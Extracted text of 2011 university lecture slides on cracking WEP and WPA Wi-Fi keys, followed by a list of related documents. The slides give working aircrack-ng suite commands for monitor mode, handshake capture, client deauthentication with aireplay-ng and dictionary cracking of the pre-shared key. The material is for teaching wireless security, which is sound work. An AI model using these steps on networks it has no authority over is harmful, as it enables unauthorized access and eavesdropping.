WLAN Security: Cracking WEP/WPA

WLAN Security:Cracking WEP/WPA

รศ. ดร. อนันต์ ผลเพิม่Assoc. Prof. Anan Phonphoem, Ph.D.

anan.p@ku.ac.thhttp://www.cpe.ku.ac.th/~anan

Computer Engineering DepartmentKasetsart University, Bangkok, Thailand

Wireless LANs2011

WEP Block Diagram

WEP Frame

IntegrityAlgorithm(CRC-32)

Pseudo-RandomNumber Generator

BitwiseXOR

Plain Text

Cipher Text

Integrity CheckValue (ICV)

Key Sequence

Secret Key (40-bit or 128-bit)

InitializationVector (IV)

Encryption BlockSender Site

IntegrityAlgorithm

BitwiseXOR

Cipher TextPlain Text

Key Sequence

Decryption BlockReceiver Site

WEP – Encoding

IntegrityAlgorithm(CRC-32)

BitwiseXOR

Plain Text

Cipher Text

Key Sequence

InitializationVector (IV)

WEP Frame

Frame Header

IV Header Frame Body ICV

Trailer FCS

EncryptedClear Text Clear Text

4 bytes

WEP – Decryption

IntegrityAlgorithm

BitwiseXORCipher Text

Plain Text

Key Sequence

Cracking WEP

Cracking Steps1) Reconnaissance (Collect target info.)

[kismet]2) Run promiscuous mode [iwconfig,

airmon]3) Collect data [airodump]4) Crack key [aircrack]

Default SSIDs

1) Reconnaissance (Collect target info.)

Kismet (Reconnaissance)

Kismet (AP Info.)

Kismet (Client Info.)

2) Run promiscuous mode

Regular Behavior

Station 1 transmits to all (broadcast)

Intention to Eavesdrop

Promiscuousmode

Station 1 transmits to station 4

iwconfig

iwlist

Promiscuous Mode Setup

• By using iwconfig

• By using airmon-ng

3) Collect data

airodumpFrom Kismet

Airodump problemroot@APMoose:~/toulouse# airodump-ng mon0ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”

anan@APMoose:~$ rfkill list0: phy0: Wireless LAN

Soft blocked: no software can reactivateHard blocked: no software cannot reactivate

1: acer-wireless: Wireless LANSoft blocked: noHard blocked: no

2: acer-bluetooth: BluetoothSoft blocked: noHard blocked: no

4: hci0: BluetoothSoft blocked: noHard blocked: no

Solve by:root@APMoose:~/toulouse# rfkill unblock all

airodump

airodump data files

4) Crack Key

aircrack• For non-encryption

aircrack

WEP Cracking Demo

Cracking WPA

Cracking Steps1)Start the wireless interface in monitor

mode on the specific AP channel2)Start airodump-ng on AP channel with

filter for bssid to collect authentication handshake

3)Use aireplay-ng to deauthenticate the wireless client

4)Run aircrack-ng to crack the pre-shared key using the authentication handshake

31http://www.aircrack-ng.org/doku.php?id=cracking_wpa

1) Start Monitoring Mode

Check interface

iwconfig

Start monitoring mode

2) Start airodump-ngcollect authentication handshake

Start airodump-ng

Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0

Parameter Description-c 6 Wireless channel--bssid 00:1E:F7:xx:xx:xx

AP’s MAC

-w psk File name prefix (contain Ivs)mon0 Interface name

Start airodump-ng less parameter

Moose# airodump-ng -w psk mon0

3) Deauthenticate client

aireplay

Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0

Parameter Description-0 deauthentication1 # deauthentication sent-a 00:12:01:xx:xx:xx AP’s MAC -c 00:23:11:xx:xx:xx Deauthing client’s MAC-mon0 Interface name

4) Crack

Need a dictionary

Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap

With dictionary

Moose# aircrack-ng -w password.lst -psk*.cap

Handshake found

Successfully Crack

WLAN Security: Cracking WEP/WPA

Documents

WLAN, WEP, WPA und Bluetooth Yosuke Suzuki 17.01.2009 Seminar Internet-Technologie Fachgebiet Praktische Informatik

WLAN Security: Cracking WEP/WPA - Kasetsart Universityanan/myhomepage/wp-content/... · 1 WLAN Security: Cracking WEP/WPA รศ. ดร. อนันต์ ผลเพิ่ม

WEP WEP 31 WPA[WPA2 Radius 'P: Radius E : Radius HI 31 … · WEP 31 WPA[WPA2 Radius 'P: Radius E : Radius HI 31 WPA-PSK[WPA2-PSK 31 WEP 86400 533815 86400 (1-65535 0 ASCII 1812 -$1_ICh

10034906 10034907 BDA IR-160 SE Internetradio auna...4 DE TECHNISCHE DATEN Artikelnummer 10034906, 10034907 Netzwerk 802.11 b/g/n (WLAN) : WEP, WPA, Verschlüsselung WPA 2(PSK), WPS

Cracking WEP on WIndows by Batista

Demostración de Vulnerabilidades en Estándares de Encriptación WEP y WPA-WPA2

Analiiza WEP, WPA, WPA2 Protokola

Guía de auditoria de WEP y WPA

Seguridad Wi-Fi – WEP, WPA y WPA2index-of.co.uk/INFOSEC/Seguridad WiFi WEP WPA y WPA2.pdf · 12 hakin9 Nº 1/2006 Tema caliente Aun cuando se activen las medidas de seguridad en

Sigurnost Bezicnih Mreza (Wep I Wpa Enkripcija) 2009 11 21 (čAkovec)

Mecanismos de Segurança de Redes IEEE 802.11: WEP, WPA

Systembeschreibung zur Kommunikation · 2015-01-19 · 7 Sichere Datenkommunikation zwischen Zellen ... 10.3 IPSec-basierte Verschlüsselung ... • IPSec • WPA • WEP • SSL

Cara Instal Backtrack di VMware Player + Bobol WEP- WPA fileCara Instal Backtrack di VMware Player + Bobol WEP- WPA Dalam makalah saya ini akan dibahas cara meng-hack wire enskrip

ANALISIS SISTEM KEAMANAN WEP, WPA DAN RADIUS PADA JARINGAN ...eprints.ums.ac.id/39920/1/halaman depan.pdf · ANALISIS SISTEM KEAMANAN WEP, WPA DAN RADIUS PADA JARINGAN HOTSPOT MIKROTIK

WLAN Security: Cracking WEP/WPAanan/myhomepage/wp-content/...aircrack • For non-encryption 27 28 aircrack 29 WEP Cracking Demo Cracking WPA 30 Cracking Steps 1) Start the wireless

ExpressionPremiumXP-720cc.cnetcontent.com/vcs/epson/inline-content/device_inkjet/F/A/FA7C… · Seguridad WLAN WEP 64 bits, WEP 128 bits, WPA PSK (TKIP), WPA PSK (AES) INFORMACIÓN

Analisis Perbandingan Keamanan WEP, WPA, WPA2, Pada Access …repository.uir.ac.id/1775/1/143510456.pdf · 2020. 3. 16. · WPA-PSK dan WPA2-PSK. 1.5 Tujuan Tujuan yang ingin dicapai

WPA vs WPA2 - Área de Ingeniería Telemática - UPNA · Introducción WEP presenta grandes debilidades de seguridad Mejoras WPA Claves de 128 bit (48bits de IV) Cambio dinámico

MZK-MF300N2 QIG-C V2 front - プラネックスコミュニ … planexuser Infra Infra Infra Infra WPA-PSK/WPA2-PSK WEP WPA-PSK WPA2-PSK Title MZK-MF300N2_QIG-C_V2_front.eps Author

Laporan Instalasi LAN - Wireless Security (WEP, WPA-PSK, MAC Filtering)